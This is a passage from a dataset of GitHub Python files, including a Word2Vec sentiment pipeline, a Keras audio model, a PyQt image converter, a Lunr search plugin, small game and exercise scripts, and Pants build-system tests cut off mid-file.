set(stopwords.words(\"english\"))\n words = [w for w in words if not w in stops]\n #\n # 5. Return a list of words\n return words\n\n\ndef review_to_sentences(review, tokenizer, remove_stopwords=False):\n # Function to split a review into parsed sentences. Returns a\n # list of sentences, where each sentence is a list of words\n #\n # 1. Use the NLTK tokenizer to split the paragraph into sentences\n raw_sentences = tokenizer.tokenize(review.strip())\n\n # 2. Loop over each sentence and append them into one list\n sentences = []\n for raw_sentence in raw_sentences:\n if len(raw_sentence) > 0:\n sentences.append(review_to_wordlist(raw_sentence, remove_stopwords))\n\n return sentences\n\n\ndef makeFeatureVec(words, model, num_features):\n # Function to average all of the word vectors in a given paragraph\n # Pre-initialize an empty numpy array (for speed)\n vec_feature = np.zeros((num_features,), dtype=\"float32\")\n\n num_words = 0\n\n # Index2word is a list that contains the names of the words in\n # the model's vocabulary. 
Convert it to a set, for speed\n # here is model.wv.index2word\n index2word_set = set(model.wv.index2word)\n\n # if it is in the model's vocabulary,\n # add its feature vector to the total\n for word in words:\n if word in index2word_set:\n num_words += 1\n vec_feature = np.add(vec_feature, model[word])\n\n # Divide the result by the number of words to get the average\n vec_feature = np.divide(vec_feature, num_words)\n\n return vec_feature\n\n\ndef getAvgFeatureVecs(reviews, model, num_features):\n # Given a set of reviews (each one a list of words), calculate\n # the average feature vector for each one and return a 2D numpy array\n counter = 0\n\n # Preallocate a 2D numpy array, for speed\n reviewFeatureVecs = np.zeros((len(reviews), num_features), dtype=\"float32\")\n\n for review in reviews:\n if counter % 5000 == 0:\n print(\"Review %d of %d\" % (counter, len(reviews)))\n reviewFeatureVecs[counter] = makeFeatureVec(review, model, num_features)\n counter += 1\n\n return reviewFeatureVecs\n\n\nif __name__ == '__main__':\n # Read data\n train = pd.read_csv(\"./input_data/labeledTrainData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\n test = pd.read_csv(\"./input_data/testData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\n unlabeled_train = pd.read_csv(\"./input_data/unlabeledTrainData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\n\n # Verify the number of reviews that were read (100,000 in total)\n # print(\"Read %d labeled train reviews, %d labeled test reviews, \"\n # \"and %d unlabeled reviews\\n\" % (train[\"review\"].size,\n # test[\"review\"].size,\n # unlabeled_train[\"review\"].size))\n\n # load the punctuation tokenizer\n tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\n\n sentences = []\n print(\"Parsing sentences from training set\")\n for review in train[\"review\"]:\n # The difference between the \"+=\" and append()\n # If you are appending a list of lists to another list of lists,\n # append() will only append the first list,\n # you will need to use \"+=\" in order to join all of the lists at once\n sentences += review_to_sentences(review, tokenizer)\n\n print(\"Parsing sentences from unlabeled set\")\n for review in unlabeled_train[\"review\"]:\n sentences += review_to_sentences(review, tokenizer)\n\n # Check how many sentences we have in total\n # should be around 850,000+\n print(\"how many sentences we have %d\\n \" % len(sentences))\n\n print(sentences[0])\n\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n # Set values for various parameters\n num_features = 300 # Word vector dimensionality\n min_word_count = 40 # Minimum word count\n num_workers = 4 # Number of threads to run in parallel\n context = 10 # Context window size\n downsampling = 1e-3 # Downsample setting for frequent words\n\n # Initialize and train the model\n print(\"Training model...\")\n model = Word2Vec(sentences,\n workers=num_workers,\n size=num_features,\n min_count=min_word_count,\n window=context,\n sample=downsampling)\n\n # If you don't plan to train the model any further, calling\n # init_sims will make the model much more memory-efficient.\n model.init_sims(replace=True)\n\n # It can be helpful to create a meaningful model name and\n # save the model for later use. 
You can load it later using Word2Vec.load()\n model_name = \"300-features_40-min_word_10-context\"\n model.save(model_name)\n\n # Test the model\n # model = Word2Vec.load(\"300-features_40-min_word_10-context\")\n # model.doesnt_match(\"man woman child kitchen\".split())\n # model.doesnt_match(\"france england germany berlin\".split())\n # model.most_similar(\"man\")\n # model.most_similar(\"queen\")\n # model.most_similar(\"awful\")\n\n # Calculate average feature vectors for training and testing sets,\n # using the functions we defined above. Notice that we now use stop words removal.\n print(\"Creating average feature vectors for train reviews\")\n clean_train_reviews = []\n for review in train[\"review\"]:\n clean_train_reviews.append(review_to_wordlist(review, remove_stopwords=True))\n\n trainDataVecs = getAvgFeatureVecs(clean_train_reviews, model, num_features)\n\n print(\"Creating average feature vectors for test reviews\")\n clean_test_reviews = []\n for review in test[\"review\"]:\n clean_test_reviews.append(review_to_wordlist(review, remove_stopwords=True))\n testDataVecs = getAvgFeatureVecs(clean_test_reviews, model, num_features)\n\n forest = RandomForestClassifier(n_estimators=100)\n\n print(\"Fitting a random forest to labeled training data...\")\n forest = forest.fit(trainDataVecs, train[\"sentiment\"])\n\n # Test and extract results\n result = forest.predict(testDataVecs)\n\n output = pd.DataFrame(data={\"id\": test[\"id\"], \"sentiment\": result})\n\n output.to_csv(\"./output/Word2Vec_AverageVectors.csv\", index=False, quoting=3)\n\n start = time.time()\n word_vectors = model.wv.syn0\n num_clusters = int(word_vectors.shape[0] / 5)\n # print(word_vectors.shape)\n\n # Initialize a k-means object and use it to extract centroids\n kmeans_clustering = KMeans(n_clusters=num_clusters)\n idx = kmeans_clustering.fit_predict(word_vectors)\n\n end = time.time()\n elapsed = end - start\n print(\"Time take for K-Means clustering: %f seconds\" % elapsed)\n\n # # Create a Word / Index dictionary, mapping each vocabulary word to a cluster number\n # word_centroid_map = dict(zip(model.wv.index2word, idx))\n # # For the first 10 clusters\n # for cluster in range(0, 10):\n # # Print the cluster number\n # print(\"\\nCluster %d\" % cluster)\n #\n # # Find all of the words for that cluster number, and print them out\n # words = []\n # for i in range(0, len(word_centroid_map.values())):\n # if word_centroid_map.values()[i] == cluster:\n # words.append(word_centroid_map.keys()[i])\n # print(words)\n\n","repo_name":"dhr1676/Word2Vec-for-movie-reviews","sub_path":"Word2Vec_v1.py","file_name":"Word2Vec_v1.py","file_ext":"py","file_size_in_byte":8279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24310434658","text":"import math\nimport tensorflow as tf\n\nWINDOW_SIZE_MS = 20\nWINDOW_STRIDE_MS = 10\nSAMPLE_RATE = 16000\n\n\ndef prepare_model_settings(dct_coefficient_count):\n \"\"\"Calculates common settings needed for all models.\n\n Args:\n dct_coefficient_count: Number of frequency bins to use for analysis.\n\n Returns:\n Dictionary containing common settings.\n \"\"\"\n desired_samples = SAMPLE_RATE\n window_size_samples = int(SAMPLE_RATE * WINDOW_SIZE_MS / 1000)\n window_stride_samples = int(SAMPLE_RATE * WINDOW_STRIDE_MS / 1000)\n length_minus_window = (desired_samples - window_size_samples)\n spectrogram_length = 1 + int(length_minus_window / window_stride_samples)\n return {\n 'spectrogram_length': spectrogram_length,\n 
'dct_coefficient_count': dct_coefficient_count\n }\n\n\ndef create_model(model_settings):\n # Loosely https://arxiv.org/abs/1703.05390\n input_frequency_size = model_settings['dct_coefficient_count']\n input_time_size = model_settings['spectrogram_length']\n\n # CNN part\n first_filter_count = 96\n first_filter_height = 8\n first_filter_width = 2\n first_filter_stride_y = 3\n first_filter_stride_x = 2\n\n model = tf.keras.Sequential()\n model.add(tf.keras.Input(shape=(input_time_size, input_frequency_size), name='fingerprint'))\n model.add(tf.keras.layers.Reshape((input_time_size, input_frequency_size, 1)))\n\n conv1 = tf.keras.layers.Conv2D(first_filter_count, kernel_size=(first_filter_height, first_filter_width),\n strides=(first_filter_stride_y, first_filter_stride_x), padding='valid', activation='relu', name='conv1', kernel_regularizer=tf.keras.regularizers.l2(0.001))\n model.add(conv1)\n\n first_conv_output_width = int(math.floor(\n (input_frequency_size - first_filter_width + first_filter_stride_x) /\n first_filter_stride_x))\n first_conv_output_height = int(math.floor(\n (input_time_size - first_filter_height + first_filter_stride_y) /\n first_filter_stride_y))\n\n # RNN part\n RNN_units = 3\n model.add(tf.keras.layers.Reshape(\n (first_conv_output_height, first_conv_output_width * first_filter_count)))\n model.add(tf.keras.layers.LSTM(RNN_units, name='lstm_1', time_major=False, return_sequences=True))\n\n model.add(tf.keras.layers.Flatten())\n first_fc_output_channels = 5\n\n dense1 = tf.keras.layers.Dense(first_fc_output_channels, activation='relu', name='dense1', kernel_regularizer=tf.keras.regularizers.l2(0.001))\n model.add(dense1)\n\n # Output layer\n dense2 = tf.keras.layers.Dense(2, activation=tf.nn.softmax, name='dense2')\n model.add(dense2)\n\n return model\n","repo_name":"coolo/kws","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31845447460","text":"from PyQt6.QtWidgets import QWidget, QLabel, QVBoxLayout, QComboBox,QApplication, QFileDialog\nfrom PyQt6.QtCore import Qt\nfrom convert import convert, acceptable\nimport time \n\n#hardcoded from pillow docs\nSUPPORTED_INPUTS = {\"jpeg\",\"jpg\",\"png\",\"heic\",\"ppm\", \"blp\",'bmp','dds','dib','eps','gif','icns','ico','im','msp','pcx','tiff', 'sgi','spider','tga','xbm'}\nSUPPORTED_OUTPUTS = sorted([\"JPG\",\"PNG\",\"HEIC\",\"PDF\",\"TIFF\",\"PPM\"])\n\nclass StatusLabel(QLabel):\n def __init__(self):\n super().__init__()\n self.setAlignment(Qt.AlignmentFlag.AlignCenter)\n self.setText(\"\\n\\nAccepting Images\\n\\n\")\n self.setMaximumHeight(100)\n\n#Putting these in global so all widgets have access to them\n#whacky hacks but work\nstatus = StatusLabel()\ntarget = SUPPORTED_OUTPUTS[0]\n\nclass Window(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Image Converter\")\n self.setGeometry(500,200,600,400)\n self.setAcceptDrops(True)\n self.imgLabel = ImageLabel()\n self.status = status\n self.dropdown = self.create_comboBox()\n mainLayout = QVBoxLayout()\n mainLayout.addWidget(self.dropdown)\n mainLayout.addWidget(self.imgLabel)\n mainLayout.addWidget(self.status)\n self.setLayout(mainLayout)\n\n \n def change_target(self, text):\n global target\n target = text\n \n def create_comboBox(self):\n combobox = QComboBox()\n combobox.setMaximumWidth(200)\n combobox.addItems(SUPPORTED_OUTPUTS)\n combobox.currentTextChanged.connect(self.change_target)\n 
return combobox\n\n \n def dragEnterEvent(self, event):\n event.accept()\n urls = event.mimeData().urls()\n urls = [url.toLocalFile() for url in urls]\n if acceptable(urls,SUPPORTED_INPUTS):\n self.status.setText(\"Images detected, release to start\")\n else:\n self.status.setText(\"File formats not supported\")\n \n def dragLeaveEvent(self,event):\n event.accept()\n self.status.setText(\"\\n\\nAccepting Images\\n\\n\")\n \n def dropEvent(self, event):\n global target\n event.accept()\n urls = event.mimeData().urls()\n urls = [url.toLocalFile() for url in urls]\n if acceptable(urls, SUPPORTED_INPUTS):\n event.setDropAction(Qt.DropAction.CopyAction)\n self.status.setText(\"Image accepted, processing\")\n self.status.repaint()\n QApplication.processEvents()\n for url in urls:\n convert(url,target)\n self.status.setText(\"\\n\\nAccepting Images\\n\\n\")\n\n\n\n\nclass ImageLabel(QLabel):\n def __init__(self) -> None:\n super().__init__()\n self.setAlignment(Qt.AlignmentFlag.AlignCenter)\n self.setText(\"\\n\\nDrop Image here\\n\\n\")\n self.setStyleSheet('''\n QLabel{\n border: 4px dashed #aaa\n }\n ''')\n \n \n def mousePressEvent(self, event) -> None:\n event.accept()\n \n def mouseReleaseEvent(self, event) -> None:\n global target\n event.accept()\n urls = QFileDialog.getOpenFileUrls(self,\"open files\")[0]\n urls = [url.toLocalFile() for url in urls]\n if acceptable(urls,SUPPORTED_INPUTS):\n for url in urls:\n status.setText(\"Image accepted, processing\")\n status.repaint()\n QApplication.processEvents()\n convert(url,target)\n else:\n status.setText(\"File formats not supported\")\n status.repaint()\n QApplication.processEvents()\n time.sleep(2)\n status.setText(\"\\n\\nAccepting Images\\n\\n\")\n \n","repo_name":"jyan1999/Image-converter","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"10807971585","text":"from catalog_system.constants import Roles, AllowedActions\n\n\nUSER_PERMISSIONS = {\n \"catalog_system.UserView\": {\n Roles.ALL_ROLES: {\"actions\": [AllowedActions.ME]},\n Roles.ADMIN: {\n \"actions\": [\n AllowedActions.RETRIEVE,\n AllowedActions.LIST,\n AllowedActions.CREATE,\n AllowedActions.UPDATE,\n AllowedActions.PARTIAL_UPDATE,\n AllowedActions.DESTROY,\n ]\n },\n },\n}\n","repo_name":"JorgeANino/ZeBrands-Public","sub_path":"app/catalog_system/user/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33100991576","text":"from Framework.ADUN import Director, Node\nfrom Object.basetower import BaseTower\nfrom pico2d import *\nimport random\n\n\nclass CannonTower(BaseTower):\n bullet = \"bullet_b\"\n damage = 10\n\n def __init__(self, x, y):\n BaseTower.__init__(self, \"cannon\", 10)\n self.money = 30\n\n self.x = x\n self.y = y\n\n def update(self):\n BaseTower.update(self)\n\n\n\n","repo_name":"adunStudio/SLIME_BREAK","sub_path":"GAME/Object/cannontower.py","file_name":"cannontower.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72654305067","text":"import numpy as np\nimport torch\nimport unittest\nfrom parameterized import parameterized\n\nfrom bridger import policies\n\n\ndef _constant_estimator(state):\n return torch.tensor([1, 0, 0, 0, 0])\n\n\ndef 
_state_is_action_estimator(state):\n q_values = torch.zeros(5)\n q_values[state % 5] = 1\n return q_values\n\n\ndef _noisy_state_is_action_estimator(state):\n q_values = torch.rand(5)\n q_values[state % 5] = 1\n return q_values\n\n\nclass TestProbabilities(unittest.TestCase):\n @parameterized.expand(\n [\n (_constant_estimator, state, epsilon, 0)\n for state in range(5)\n for epsilon in np.linspace(0, 1, 10)\n ]\n + [\n (estimator, state, epsilon, state % 5)\n for estimator in [\n _state_is_action_estimator,\n _noisy_state_is_action_estimator,\n ]\n for state in range(10)\n for epsilon in np.linspace(0, 1, 10)\n ]\n )\n def test_eps_greedy_policy(self, estimator, state, epsilon, mode_action):\n policy = policies.EpsilonGreedyPolicy(estimator, epsilon=epsilon)\n probs = policy.get_probabilities(state).numpy()\n self.assertAlmostEqual(probs[mode_action - 1], epsilon / len(probs))\n if epsilon != 1:\n self.assertEqual(len(set(probs)), 2)\n self.assertEqual(probs.argmax(), mode_action)\n self.assertAlmostEqual(probs.sum(), 1, places=6)\n\n @parameterized.expand(\n [(_constant_estimator, state, 0) for state in range(5)]\n + [\n (estimator, state, state % 5)\n for estimator in [\n _state_is_action_estimator,\n _noisy_state_is_action_estimator,\n ]\n for state in range(10)\n ]\n )\n def test_greedy_policy(self, estimator, state, mode_action):\n policy = policies.GreedyPolicy(estimator)\n probs = policy.get_probabilities(state).numpy()\n expected = np.zeros(probs.shape)\n expected[mode_action] = 1\n self.assertTrue(np.allclose(probs, expected))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"ldoshi/rome-wasnt-built-in-a-day","sub_path":"bridger/policies_test.py","file_name":"policies_test.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15384882916","text":"import streamlit as st\nimport requests\n\nst.title('welcome to the app!')\n\nst.header('enter the text to find the part of text responsible for the sentiment of text')\n\ntweet=st.text_input('enter the text')\nsentiment_maps={0:'neutral',1:'positive',2:'negative'}\nif tweet:\n with st.spinner('prediction is in progress'):\n tweet_data={'tweet':tweet}\n extraction_data={'tweet':tweet,'sentiment':0}\n response=requests.post('http://fastapi:8000/sentiment',json=tweet_data).json()\n extraction_data['sentiment']=sentiment_maps.get(response['sentiment'])\n extracted_pred=requests.post('http://fastapi:8000/extraction',json=extraction_data).json()\n st.success(f\"the sentiment given text lead is {extraction_data['sentiment']}\")\n st.success(f\"part of text responsible for that sentiment is {extracted_pred['extracted_text']}\")\n ","repo_name":"RavitejaBadugu/tes","sub_path":"streamlit/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39319061008","text":"\"\"\"\n hon_lunr\n ~~~~~\n\n A plugin for the Hon utility. 
It extends the Hon HTML output by adding\n search indexing using Lunr to the book's website.\n\n :license: MIT, see LICENSE for more details.\n\"\"\"\nimport hon\nimport json\nimport os\nimport shutil\nfrom hon.plugins import Plugin\nfrom html.parser import HTMLParser\nfrom jinja2 import (\n Environment,\n PackageLoader,\n Template,\n select_autoescape\n)\nfrom lunr import lunr\n\n\n#: The Hon-Lunr plugin's path.\nLUNR_PLUGIN_PATH = os.path.abspath(os.path.dirname(__file__))\n\n#: The default maximum number of documents that Lunr can index.\nDEFAULT_MAX_INDEX_SIZE = 1000000\n\n\ndef _on_finish_render(app, book=None, renderer=None, context=None):\n \"\"\"Function connected to rendering finished signal.\n \"\"\"\n lunr = app.get_plugin(Lunr)\n lunr.on_finish(book, renderer, context)\n\n\ndef _on_before_render(app, book=None, renderer=None, context=None):\n \"\"\"Function connected to the before render signal.\n \"\"\"\n lunr = app.get_plugin(Lunr)\n lunr.before_render(book, renderer, context)\n\n\ndef _on_generate_assets(app, book=None, renderer=None, context=None):\n \"\"\"Function connected to the asset generation signal.\n \"\"\"\n lunr = app.get_plugin(Lunr)\n lunr.generate_assets(book, renderer, context)\n\n\ndef _on_after_render_page(app, book=None, renderer=None, page=None, context=None):\n \"\"\"Function connected to the after page render signal.\n \"\"\"\n lunr = app.get_plugin(Lunr)\n lunr.after_render_page(book, renderer, page, context)\n\n\nclass PageTextParser(HTMLParser):\n \"\"\"\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(PageTextParser, self).__init__(*args, **kwargs)\n self.text = ''\n\n def handle_data(self, data):\n text = str(data).strip()\n if text:\n self.text += text\n\n\nclass Lunr(Plugin):\n \"\"\"A Hon plugin that adds Lunr search indexing.\n\n Lunr has issues with indexing more than 100k documents.\n\n :type document_store: dict\n :type search_index: object\n \"\"\"\n _name = 'Lunr'\n\n default_config = {\n 'enabled': True,\n 'max_index_size': DEFAULT_MAX_INDEX_SIZE\n }\n\n @property\n def assets_dir(self):\n \"\"\"\n \"\"\"\n path = os.path.join(LUNR_PLUGIN_PATH, 'assets')\n return path\n\n @property\n def max_index_size(self):\n \"\"\"\n \"\"\"\n return self.config.get('max_index_size', DEFAULT_MAX_INDEX_SIZE)\n\n def __init__(self, app, config=None):\n super(Lunr, self).__init__(app, config=config)\n #: The document store that will\n self.document_store = {}\n\n #:\n self.search_index = None\n\n if app:\n self.init_app(app)\n\n def add_document(self, page_url, title, summary, keywords, body):\n document = {\n 'url': page_url,\n 'title': title,\n 'summary': summary,\n 'keywords': keywords,\n 'body': body\n }\n self.document_store[page_url] = document\n return document\n\n def init_app(self, app):\n self.app.logger.debug('Initializing Lunr plugin for Hon...')\n self.environment = Environment(\n loader=PackageLoader('hon_lunr', 'templates')\n )\n\n #: Hook up the Lunr search plugin to relevant events...\n hon.after_render_page.connect(_on_after_render_page)\n hon.before_render.connect(_on_before_render)\n hon.finish_render.connect(_on_finish_render)\n hon.generate_assets.connect(_on_generate_assets)\n\n def after_render_page(self, book, renderer, page, context):\n \"\"\"\n \"\"\"\n if renderer.name != 'html' or not self.enabled or not page.search:\n return\n\n self.app.logger.debug('index page {}'.format(page.path))\n search_text = self.parse_search_text(page)\n self.add_document(page.link, page.title, page.summary,\n page.keywords, search_text)\n\n 
def before_render(self, book, renderer, context):\n \"\"\"\n\n :param context: The rendering context for the book.\n :type context: hon.renderers.RenderingContext\n \"\"\"\n if renderer.name != 'html' or not self.enabled:\n return\n\n print('*** context: {}'.format(context))\n context.add_plugin_resource({ 'path': 'js/lunr.js' }, 'js')\n context.add_plugin_resource({ 'path': 'js/hon-lunr.js' }, 'js')\n print('*** context: {}'.format(context))\n\n def generate_assets(self, book, renderer, context):\n if renderer.name != 'html' or not self.enabled:\n return\n\n js_output_dir = os.path.join(context.path, 'js')\n\n for asset_file in os.listdir(self.assets_dir):\n source = os.path.join(self.assets_dir, asset_file)\n if os.path.isfile(source):\n dest = os.path.join(js_output_dir, asset_file)\n shutil.copyfile(source, dest)\n\n def on_finish(self, book, renderer, context):\n if renderer.name != 'html' or not self.enabled:\n return\n\n js_output_dir = os.path.join(context.path, 'js')\n\n self.app.logger.debug('write search index')\n self.search_index = lunr(\n ref='url',\n fields=[\n dict(field_name='title', boost=10),\n dict(field_name='keywords', boost=15),\n 'body'\n ],\n documents=self.document_store.values()\n )\n serialized_index = self.search_index.serialize()\n serialized = json.dumps(serialized_index)\n\n template = self.environment.get_template('hon-lunr.js.jinja')\n output = template.render({\n 'hon_lunr': {\n 'search_index': serialized\n }\n })\n\n hon_lunr_filename = 'hon-lunr.js'\n hon_lunr_filepath = os.path.join(js_output_dir, hon_lunr_filename)\n with open(hon_lunr_filepath, 'w') as f:\n f.write(output)\n\n def parse_search_text(self, page):\n \"\"\"\n \"\"\"\n parser = PageTextParser()\n parser.feed(page.text)\n return parser.text\n","repo_name":"swquinn/hon-lunr","sub_path":"hon_lunr/lunr.py","file_name":"lunr.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6927657351","text":"n=int(input())\na=list(map(int, input().split()))\nb=sorted(a)\n\nif a==b:\n print(0)\nelse:\n for i in range(1, n):\n if a[i] < a[i-1]:\n if a[i:]==b[:n-i]:\n a[i:]==b[:n-i]\n print(len(a[i:]))\n else:\n print(-1)\n break\n\n# can alos be written as \n# for i in range(1, n):\n# if a[i] < a[i-1]:\n# print(n-i if a[i:]==b[:n-i] else -1)\n# break\n# else:\n# print(0)","repo_name":"Raffian-moin/Codeforces-solutions","sub_path":"codeforces/1200/little_pony_and_sort_by_shift.py","file_name":"little_pony_and_sort_by_shift.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35395782088","text":"#______________________________This_Game________________________\r\n#The purpose of this exercice is to get better with pygame to make games that\r\n#comes to mind.\r\n#______________________________Libraries________________________\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\n\r\npygame.init()\r\n#_______________________________Functions________________________\r\n\r\ndef colour_time(colour_list_str):\r\n while True:\r\n colour_input = input(\"What colour?\")\r\n if colour_input.upper() not in colour_list_str:\r\n print(\"Colour not in list.\")\r\n else:\r\n break\r\n return colour_input\r\n\r\ndef choose_colour(colour, colour_list_str, colour_list_int):\r\n chk = 0\r\n for colour in colour_list_str:\r\n if colour in colour_list_str:\r\n choosen_colour = colour_list_int[chk]\r\n return 
choosen_colour\r\n\r\ndef size_time():\r\n while True:\r\n size_input = input(\"How big do you want the screen in x and y?\")\r\n size_input_x, size_input_y = size_input.split(\",\")\r\n if size_input_x.isnumeric() and size_input_y.isnumeric == False:\r\n print(\"You input is not noumeric\")\r\n elif int(size_input_x) and int(size_input_y) >= 1000:\r\n print(\"Your input exceeds 1000\")\r\n else: \r\n break\r\n return int(size_input_x), int(size_input_y)\r\n\r\ndef name_time():\r\n while True:\r\n name_input = input(\"Name of the Game?\")\r\n if len(name_input) <= 2 or name_input[0].isalpha == False:\r\n print(\"Invalid name\")\r\n else:\r\n break\r\n return name_input\r\n\r\n#______________________________Identifiers______________________\r\nDISPLAYSURF = pygame.display.set_mode((400, 300))\r\npygame.display.set_caption(f'{name_time()}')\r\nsize_x, size_y = size_time()\r\nprint(size_x, size_y)\r\nscreen = pygame.display.set_mode((size_x, size_y))\r\n\r\nBLACK = (255, 255, 255)\r\nWHITE = (0,0,0)\r\nYELLOW = (255, 225, 0)\r\nFUCHSIA = (255, 0, 255)\r\ncolour_list_int = [BLACK, WHITE, YELLOW, FUCHSIA]\r\ncolour_list_str = [\"BLACK\", \"WHITE\", \"YELLOW\", \"FUCHSIA\"]\r\n\r\nscreen_colour = colour_time(colour_list_str)\r\nprint(screen_colour)\r\n\r\n\r\n#______________________________Logic____________________________\r\n\r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n#___________________Functions___________________\r\n\r\n\r\n\r\n#______________________________Drawing__________________________\r\n\r\n screen.fill(choose_colour(screen_colour, colour_list_str, colour_list_int))\r\n\r\n#______________________________Ending___________________________\r\n pygame.display.update()\r\n\r\n","repo_name":"BubbleTitan74/Games_n_Stuff","sub_path":"PyGame_Exercices/pg1-2-1.py","file_name":"pg1-2-1.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29116383434","text":"from __future__ import annotations\n\nimport os\nimport tarfile\nimport zipfile\nfrom io import BytesIO\nfrom textwrap import dedent\n\nfrom pants.backend.python import target_types_rules as python_target_type_rules\nfrom pants.backend.python.goals import package_pex_binary\nfrom pants.backend.python.target_types import PexBinary\nfrom pants.backend.python.util_rules import pex_from_targets\nfrom pants.core import target_types as core_target_types\nfrom pants.core.goals.package import BuiltPackage\nfrom pants.core.target_types import (\n ArchiveFieldSet,\n ArchiveTarget,\n FilesGeneratorTarget,\n FileSourceField,\n FileTarget,\n GenerateTargetsFromFiles,\n GenerateTargetsFromResources,\n RelocatedFiles,\n RelocateFilesViaCodegenRequest,\n ResourcesGeneratorTarget,\n ResourceTarget,\n)\nfrom pants.core.target_types import rules as target_type_rules\nfrom pants.core.util_rules.archive import rules as archive_rules\nfrom pants.core.util_rules.source_files import SourceFiles, SourceFilesRequest\nfrom pants.core.util_rules.source_files import rules as source_files_rules\nfrom pants.engine.addresses import Address\nfrom pants.engine.fs import EMPTY_SNAPSHOT, DigestContents, FileContent\nfrom pants.engine.target import (\n GeneratedSources,\n GeneratedTargets,\n SingleSourceField,\n SourcesField,\n Tags,\n TransitiveTargets,\n TransitiveTargetsRequest,\n)\nfrom pants.testutil.rule_runner import QueryRule, RuleRunner\n\n\ndef test_relocated_files() -> None:\n rule_runner = 
RuleRunner(\n rules=[\n *target_type_rules(),\n *archive_rules(),\n *source_files_rules(),\n QueryRule(GeneratedSources, [RelocateFilesViaCodegenRequest]),\n QueryRule(TransitiveTargets, [TransitiveTargetsRequest]),\n QueryRule(SourceFiles, [SourceFilesRequest]),\n ],\n target_types=[FilesGeneratorTarget, RelocatedFiles],\n )\n\n def assert_prefix_mapping(\n *,\n original: str,\n src: str,\n dest: str,\n expected: str,\n ) -> None:\n rule_runner.write_files(\n {\n original: \"\",\n \"BUILD\": dedent(\n f\"\"\"\\\n files(name=\"original\", sources=[{repr(original)}])\n\n relocated_files(\n name=\"relocated\",\n files_targets=[\":original\"],\n src={repr(src)},\n dest={repr(dest)},\n )\n \"\"\"\n ),\n }\n )\n\n tgt = rule_runner.get_target(Address(\"\", target_name=\"relocated\"))\n result = rule_runner.request(\n GeneratedSources, [RelocateFilesViaCodegenRequest(EMPTY_SNAPSHOT, tgt)]\n )\n assert result.snapshot.files == (expected,)\n\n # We also ensure that when looking at the transitive dependencies of the `relocated_files`\n # target and then getting all the code of that closure, we only end up with the relocated\n # files. If we naively marked the original files targets as a typical `Dependencies` field,\n # we would hit this issue.\n transitive_targets = rule_runner.request(\n TransitiveTargets, [TransitiveTargetsRequest([tgt.address])]\n )\n all_sources = rule_runner.request(\n SourceFiles,\n [\n SourceFilesRequest(\n (tgt.get(SourcesField) for tgt in transitive_targets.closure),\n enable_codegen=True,\n for_sources_types=(FileSourceField,),\n )\n ],\n )\n assert all_sources.snapshot.files == (expected,)\n\n # No-op.\n assert_prefix_mapping(original=\"old_prefix/f.ext\", src=\"\", dest=\"\", expected=\"old_prefix/f.ext\")\n assert_prefix_mapping(\n original=\"old_prefix/f.ext\",\n src=\"old_prefix\",\n dest=\"old_prefix\",\n expected=\"old_prefix/f.ext\",\n )\n\n # Remove prefix.\n assert_prefix_mapping(original=\"old_prefix/f.ext\", src=\"old_prefix\", dest=\"\", expected=\"f.ext\")\n assert_prefix_mapping(\n original=\"old_prefix/subdir/f.ext\", src=\"old_prefix\", dest=\"\", expected=\"subdir/f.ext\"\n )\n\n # Add prefix.\n assert_prefix_mapping(original=\"f.ext\", src=\"\", dest=\"new_prefix\", expected=\"new_prefix/f.ext\")\n assert_prefix_mapping(\n original=\"old_prefix/f.ext\",\n src=\"\",\n dest=\"new_prefix\",\n expected=\"new_prefix/old_prefix/f.ext\",\n )\n\n # Replace prefix.\n assert_prefix_mapping(\n original=\"old_prefix/f.ext\",\n src=\"old_prefix\",\n dest=\"new_prefix\",\n expected=\"new_prefix/f.ext\",\n )\n assert_prefix_mapping(\n original=\"old_prefix/f.ext\",\n src=\"old_prefix\",\n dest=\"new_prefix/subdir\",\n expected=\"new_prefix/subdir/f.ext\",\n )\n\n # Replace prefix, but preserve a common start.\n assert_prefix_mapping(\n original=\"common_prefix/foo/f.ext\",\n src=\"common_prefix/foo\",\n dest=\"common_prefix/bar\",\n expected=\"common_prefix/bar/f.ext\",\n )\n assert_prefix_mapping(\n original=\"common_prefix/subdir/f.ext\",\n src=\"common_prefix/subdir\",\n dest=\"common_prefix\",\n expected=\"common_prefix/f.ext\",\n )\n\n\ndef test_archive() -> None:\n \"\"\"Integration test for the `archive` target type.\n\n This tests some edges:\n * Using both `files` and `relocated_files`.\n * An `archive` containing another `archive`.\n \"\"\"\n\n rule_runner = RuleRunner(\n rules=[\n *target_type_rules(),\n *pex_from_targets.rules(),\n 